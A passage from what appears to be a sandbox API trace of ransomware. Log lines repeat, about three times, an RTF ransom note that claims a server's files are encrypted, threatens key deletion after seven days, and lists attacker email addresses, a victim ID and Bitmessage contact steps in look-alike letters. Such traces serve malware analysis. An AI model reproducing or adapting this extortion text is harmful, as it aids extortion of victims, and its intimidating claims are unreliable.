INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23698d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 